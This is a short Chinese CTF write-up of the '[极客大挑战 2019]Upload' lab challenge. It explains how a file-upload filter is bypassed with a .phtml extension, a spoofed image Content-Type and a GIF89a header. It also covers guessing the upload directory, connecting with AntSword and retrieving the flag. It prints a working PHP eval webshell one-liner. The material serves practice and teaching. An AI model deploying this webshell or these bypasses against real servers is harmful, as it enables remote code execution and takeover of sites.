练习14 Web [极客大挑战 2019]Upload

phtml格式绕过，burp修改content-type绕过，常见的文件上传存放目录名

题目就叫upload，打开靶机
直接上传一个图片格式的一句话木马，返回如下：

提交练习5和9中的两种可以执行图片格式php代码的文件，修改content-type为image/jpeg

同样提示不能上传image以外的格式。
在代码前加上gif文件头标识，同时修改木马后缀为gif

上传成功

GIF89a?<script language='php'>eval($_POST['cmd']);</script>

但是这题返回值没有提示存放路径

手动查找可能的目录
在前端源码videos目录，访问

于是逻辑推断存在images这个文件夹，访问
啥也没有

然后一开始上传文件成功的页面叫upload_file.php
尝试uploads、upload 目录
访问
成功，并找到我上传的木马文件


蚁剑连接：

http://f9e21dca-f92d-48fc-8d7d-8571df923f06.node5.buuoj.cn/upload/muma.phtml


根目录拿到flag
flag{d67b491d-4e6a-49f7-90b7-93f761b88aa1}